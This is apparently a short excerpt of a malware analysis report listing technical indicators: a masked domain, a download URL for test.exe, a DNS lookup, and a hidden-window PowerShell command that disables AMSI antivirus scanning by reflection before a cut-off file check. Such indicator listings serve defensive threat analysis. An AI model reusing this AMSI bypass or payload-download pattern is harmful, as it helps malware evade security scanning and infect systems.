Technical Information
- 'sa#####tealimentaire.ca':80
- http://www.sa#####tealimentaire.ca/test.exe
- DNS ASK sa#####tealimentaire.ca
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -noprofile [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);If (test-path $env:APPDATA +...' (with hidden window)